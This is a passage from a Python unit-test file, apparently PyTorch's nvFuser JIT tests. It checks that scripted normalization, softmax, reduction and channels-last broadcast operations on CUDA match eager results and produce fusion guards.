jit_o = t_jit(x, running_mean.clone(), running_var.clone())
self.assertTrue(self._compare("prerun comparing running_mean failed", eager_running_mean, jit_running_mean, error))
self.assertTrue(self._compare("prerun comparing running_var failed", eager_running_var, jit_running_var, error))
jit_o = t_jit(x, jit_running_mean, jit_running_var)
o = t(x, eager_running_mean, eager_running_var)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.stride(), jit_o.stride())
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
self.assertTrue(self._compare("comparing running_mean failed", eager_running_mean, jit_running_mean, error))
self.assertTrue(self._compare("comparing running_var failed", eager_running_var, jit_running_var, error))
self.assertGraphContains(t_jit.graph_for(x, running_mean, running_var), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_layer_norm_trivial_reduce_dim(self):
def t_wb(shapes: List[int], x, w, b, eps: float, cudnn: bool):
o = torch.layer_norm(x, shapes, w, b, eps, cudnn)
o = torch.relu(o)
return o
batch = [1]
shapes = [2, 7, 3]
grad = torch.randn(batch + shapes, dtype=torch.float32, device="cuda")
args = [torch.randn(batch + shapes, dtype=torch.float32, device="cuda").requires_grad_()]
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
args.append(torch.randn(shapes, dtype=torch.float32, device="cuda").requires_grad_())
self._layer_norm_autodiff_helper(t_wb, grad, shapes, args)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_half_layer(self):
size = [2, 4, 2, 2]
for is_batch_norm_else_instance_norm in [False, True]:
for mf in [torch.channels_last, torch.contiguous_format]:
self._norm_helper(size, torch.float16, "cuda", 1e-3, is_batch_norm_else_instance_norm,
memory_format=mf, layer_dtype=torch.float16)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_channels_last(self):
size = [3, 4, 5, 6]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for mf in [torch.channels_last, torch.contiguous_format]:
self._norm_helper(size, torch.float32, "cuda", 1e-4, is_batch_norm_else_instance_norm, memory_format=mf)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm(self):
output_elements = 10000
channel_sizes = [67, 457, 1024, 4096]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.float32, "cuda", 1e-4, is_batch_norm_else_instance_norm)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_large(self):
output_elements = 262144
channel_sizes = [67, 457, 1024]
for is_batch_norm_else_instance_norm in [True, False]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.float32, "cuda", 1e-4, is_batch_norm_else_instance_norm)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_norm_half(self):
output_elements = 10000
channel_sizes = [67, 457, 1024, 4096]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.float16, "cuda", 5e-3, is_batch_norm_else_instance_norm)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_norm_bfloat(self):
output_elements = 10000
channel_sizes = [67, 457, 1024, 4096]
with torch.backends.cudnn.flags(enabled=False):
for is_batch_norm_else_instance_norm in [False, True]:
for dims in range(3, 6):
output_size = int(pow(output_elements, 1. / (dims - 1)))
for C in channel_sizes:
x = [output_size for idx in range(dims)]
x[1] = C
self._norm_helper(x, torch.bfloat16, "cuda", 1e-1, is_batch_norm_else_instance_norm)
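# Helper shared by the softmax tests: add two inputs then apply softmax or
# log_softmax over `reduction_axis`. For float64 inputs it runs gradcheck;
# otherwise it compares the scripted output against eager within `error`
# and checks for a fusion guard.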
def _softmax_helper(self, shape, reduction_axis, is_log_softmax, dtype, device, error):
class MySoftmax(torch.nn.Module):
__constants__ = ['reduction_axis']
def __init__(self):
super(MySoftmax, self).__init__()
self.reduction_axis = reduction_axis
def forward(self, x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.nn.functional.softmax(o, dim=self.reduction_axis)
return o
class MyLogSoftmax(torch.nn.Module):
__constants__ = ['reduction_axis']
def __init__(self):
super(MyLogSoftmax, self).__init__()
self.reduction_axis = reduction_axis
def forward(self, x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.nn.functional.log_softmax(o, dim=self.reduction_axis)
return o
gradient_check = (dtype == torch.float64)
t = MyLogSoftmax() if is_log_softmax else MySoftmax()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=gradient_check)
y = torch.randn(shape, dtype=dtype, device=device, requires_grad=gradient_check)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
if gradient_check:
gradcheck(t_jit.forward, [x, y], nondet_tol=1e-5)
else:
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softmax_dtype(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = torch.nn.functional.softmax(o, dim=0, dtype=torch.float32)
return o
x = torch.randn([4, 4], dtype=torch.float16, device="cuda").requires_grad_()
y = torch.randn_like(x).requires_grad_()
grad = torch.randn_like(x).float()
ref_x = x.detach().requires_grad_()
ref_y = y.detach().requires_grad_()
o = t(ref_x, ref_y)
o.backward(grad)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o.backward(grad)
jit_o = t_jit(x, y)
jit_o.backward(grad)
jit_o = t_jit(x, y)
jit_o.backward(grad)
x.grad.zero_()
y.grad.zero_()
jit_o = t_jit(x, y)
jit_o.backward(grad)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(ref_x.grad, x.grad)
self.assertEqual(ref_y.grad, y.grad)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-3))
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 1, consider_subgraphs=True)
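# dig the backward graph out of the grad executor state of the (single)
# forward execution plan, then confirm it also contains a fusion guard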
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GUARD).run(bwd_graph)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test__softmax_function(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = torch._softmax(o, dim=-1, half_to_float=False)
return o
x = torch.randn([4, 4], dtype=torch.float16, device="cuda")
y = torch.randn_like(x)
o = t(x, y)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-3))
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test__softmax_function_half_to_float(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = torch._softmax(o, dim=-1, half_to_float=True)
return o
x = torch.randn([4, 4], dtype=torch.float16, device="cuda")
y = torch.randn_like(x)
o = t(x, y)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-3))
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softmax(self):
output_size = 10000
dims = 4
output_size = int(pow(output_size, 1. / dims))
reduction_sizes = [67, 256, 1024, 4096]
# gradient check
for reduction_dim in range(dims):
for is_log_softmax in [False, True]:
shape = [output_size for idx in range(dims)]
self._softmax_helper(shape, reduction_dim, is_log_softmax, torch.float64, "cuda", 1e-4)
for reduction_dim in range(dims):
for reduction_size in reduction_sizes:
x = [output_size for idx in range(dims)]
x[reduction_dim] = reduction_size
for is_log_softmax in [False, True]:
self._softmax_helper(x, reduction_dim, is_log_softmax, torch.float32, "cuda", 1e-4)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softmax_half(self):
output_size = 10000
dims = 4
output_size = int(pow(output_size, 1. / dims))
reduction_sizes = [67, 256, 1024, 4096]
for reduction_dim in range(dims):
for reduction_size in reduction_sizes:
x = [output_size for idx in range(dims)]
x[reduction_dim] = reduction_size
for is_log_softmax in [False, True]:
self._softmax_helper(x, reduction_dim, is_log_softmax, torch.float16, "cuda", 5e-3)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_softmax_bfloat(self):
output_size = 10000
dims = 4
output_size = int(pow(output_size, 1. / dims))
reduction_sizes = [67, 256, 1024, 4096]
for reduction_dim in range(dims):
for reduction_size in reduction_sizes:
x = [output_size for idx in range(dims)]
x[reduction_dim] = reduction_size
for is_log_softmax in [False, True]:
self._softmax_helper(x, reduction_dim, is_log_softmax, torch.bfloat16, "cuda", 1e-1)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_permutation(self):
x = [7, 8, 12]
# note that num_dim is exclusive from len(x), so we are not reducing
# to single element (codegen limitation at this moment)
for num_reduce_dim in range(1, len(x)):
for axes in itertools.combinations(range(len(x)), num_reduce_dim):
for perm0 in itertools.permutations(range(len(x))):
for perm1 in itertools.permutations(range(len(x))):
self._reduction_helper(x, axes, torch.float32, "cuda", perm0, perm1)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_multiple_output(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
torch._C._jit_set_bailout_depth(20)
def t(x: torch.Tensor, y: torch.Tensor, scale: float, z: torch.Tensor):
o = torch.mul(x, y)
o = torch.mul(o, scale)
out1 = torch.mul(o, z)
out2 = torch.sum(out1, dim=[2])
return out1, out2
t_jit = torch.jit.script(t)
x = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
y = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
z = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
scale = 0.5
jit_o = t_jit(x, y, scale, z)
jit_o = t_jit(x, y, scale, z)
o = t(x, y, scale, z)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, scale, z), FUSION_GUARD)
x = x.to(memory_format=torch.channels_last)
y = y.to(memory_format=torch.channels_last)
z = z.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y, scale, z)
jit_o = t_jit(x, y, scale, z)
o = t(x, y, scale, z)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, scale, z), FUSION_GUARD)
torch._C._jit_set_nvfuser_guard_mode(old_guard)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_channels_last_with_broadcast(self):
# setting this to true forces a new graph to be generated whenever an
# input arrives with a different broadcast shape
torch._C._jit_set_nvfuser_guard_mode(True)
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.mul(x, y)
o = o + 2.0
return o
t_jit = torch.jit.script(t)
# Single Channel broadcasts
# Test 1
x = torch.randn(8, 4, 10, 16, dtype=torch.float, device="cuda")
x = x.to(memory_format=torch.channels_last)
y = torch.randn(8, 4, 10, 1, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 2
y = torch.randn(8, 4, 1, 16, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 3
y = torch.randn(8, 1, 10, 16, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 4
y = torch.randn(1, 4, 10, 16, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
'''
Currently, the JIT doesn't have tensor merge logic to handle adding
a broadcast tensor with more than one broadcast into a non-broadcast
tensor. Therefore, either of these tests can fail depending on the
sort implementation. The second test is known to fail.
# Two Channel broadcasts
# Test 1
y = torch.randn(8, 4, 1, 1, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
# Test 2
y = torch.randn(8, 4, 1, 1, dtype=torch.float, device="cuda")
y = y.to(memory_format=torch.channels_last).transpose(2,3)
x = x.transpose(2,3)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o.is_contiguous(memory_format=torch.channels_last),
jit_o.is_contiguous(memory_format=torch.channels_last))
self.assertEqual(o, jit_o)
'''
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_pw_single_reduction_partition(self):
sizes = [2, 2, 2]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device)
y = torch.randn(sizes, dtype=dtype, device=device)
z = torch.randn(sizes, dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, y)
o = torch.sum(o, dim=[0])
o = torch.add(o, z)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
def t(x: torch.Tensor):
o = torch.relu(x)
o = torch.sum(o, dim=[0])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
# TODO: we could preserve permutation to inputs
self.assertEqual(o.stride(), jit_o.stride())
def t(x: torch.Tensor):
o = torch.relu(x)
o = torch.add(o, 1.0)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
self.assertTrue(jit_o.is_contiguous(memory_format=torch.channels_last))
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation_edge_case_0(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
# mismatched rank; *note* the different permutation recognized by the profiling executor (PE)
bias = torch.randn(3, dtype=dtype, device=device).unsqueeze(-1).unsqueeze(-1)
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
with nvfuser_singleton_fusion(True):
for _ in range(5):
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(o.stride(), jit_o.stride())
self.assertGraphContains(t_jit.graph_for(x, bias), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation_edge_case_1_broken(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
# incompatible permutation; this will cause format propagation to break
bias = torch.randn(4, 5, dtype=dtype, device=device)
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
with nvfuser_singleton_fusion(True):
for _ in range(5):
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
try:
# nvfuser does not support incompatible permutation; this will throw
self.assertEqual(o.stride(), jit_o.stride())
except Exception as e:
warnings.warn(
"permutation propagatoin is broken, proper support should come after nvfuser permutation scheduler update")
self.assertGraphContains(t_jit.graph_for(x, bias), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_permutation_preservation_edge_case_2(self):
sizes = [2, 3, 4, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
y = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
z = torch.randn(sizes, dtype=dtype, device=device).to(memory_format=torch.channels_last)
def t(x, y, w):
tmp = torch.lerp(x, y, w)
tmp = torch.clamp(tmp, -1.0, 0.5)
tmp = torch.nn.functional.softplus(tmp)
return torch.threshold(tmp, -2.0, 0.5)
t_jit = torch.jit.script(t)
with nvfuser_singleton_fusion(True):
for _ in range(5):
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(o.stride(), jit_o.stride())
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_normalization_partition(self):
sizes = [3, 8, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device)
y = torch.randn(sizes, dtype=dtype, device=device)
z = torch.randn(sizes, dtype=dtype, device=device)
r_m = torch.randn(8, dtype=dtype, device=device)
r_v = torch.randn(8, dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, r_mean: torch.Tensor, r_var: torch.Tensor):
o = torch.add(x, y)
o = torch.nn.functional.softmax(o, dim=0)
o = torch.add(o, z)
o = torch.nn.functional.batch_norm(o, r_mean, r_var, training=True)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z, r_m, r_v)
jit_o = t_jit(x, y, z, r_m, r_v)
o = t(x, y, z, r_m, r_v)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z, r_m, r_v), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sum_to_one(self):
dtype = torch.float
device = "cuda"
x = torch.randn([4, 5, 6], dtype=dtype, device=device)
def t(x: torch.Tensor):
o = torch.add(x, 1)
o = torch.sum(o, dim=[0, 1, 2])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_single_reduction_broadcast(self):
dtype = torch.float
device = "cuda"
x = torch.randn([7, 4, 8], dtype=dtype, device=device)
y = torch.randn([4, 8], dtype=dtype, device=device)
z = torch.randn([1, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, y)
o = torch.add(o, z)
o = torch.sum(o, dim=[0])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_trivial_reduction(self):
dtype = torch.float
device = "cuda"
x = torch.randn([1, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor):
o = torch.add(x, 1)
o = torch.sum(o, dim=[0])
o = torch.sum(o, dim=[0])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_profiling_node(self):
dtype = torch.float
device = "cuda"
x = torch.randn(4, 8, 8, 8, dtype=dtype, device=device)
def repro(x: torch.Tensor, alpha: float):
o = torch.rand_like(x)
o = torch.add(o, alpha)
return o
repro_jit = torch.jit.script(repro)
self._run_helper(repro_jit, repro, x, 0.6)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_sizes_op(self):
dtype = torch.float
device = "cuda"
x = torch.randn(2, 3, 4, 5, dtype=dtype, device=device)
y = torch.randn(2, 3, 4, 5, dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor):
o = x + y
o = torch.relu(o)
o = o.sum((1, 3))
return o.size()
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o, jit_o)
# since the output value is not used at all, the fusion operator should
# have been optimized away
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 0)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_profile_ivalue(self):
dtype = torch.float
device = "cuda"
x = torch.randn([7, 4, 7], dtype=dtype, device=device)
y = torch.randn([7, 4, 7], dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, dim: List[int], keepdim: bool):
o = torch.add(x, y)
o = o.sum(dim, keepdim=keepdim)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, (0, 1), False)
jit_o = t_jit(x, y, (0, 1), False)
o = t(x, y, (0, 1), False)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, (0, 1), False), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sum_to_size(self):
dtype = torch.float
device = "cuda"
x = torch.randn([2, 4, 4], dtype=dtype, device=device)
y = torch.randn([2, 4, 4], dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, new_size: List[int]):
o = torch.add(x, y)
o = o.sum_to_size(new_size)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, (4, 1))
jit_o = t_jit(x, y, (4, 1))
o = t(x, y, (4, 1))
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, (4, 1)), FUSION_GUARD)
# update shape: old kernel should handle dynamic shape well without
# recompilation
x = torch.randn([2, 5, 8], dtype=dtype, device=device)
y = torch.randn([2, 5, 8], dtype=dtype, device=device)
# (TODO) check executed kernel, should extend autograd.profiler to fused
# kernels
jit_o = t_jit(x, y, (5, 1))
o = t(x, y, (5, 1))
self.assertEqual(o.dtype, jit_o.dtype)
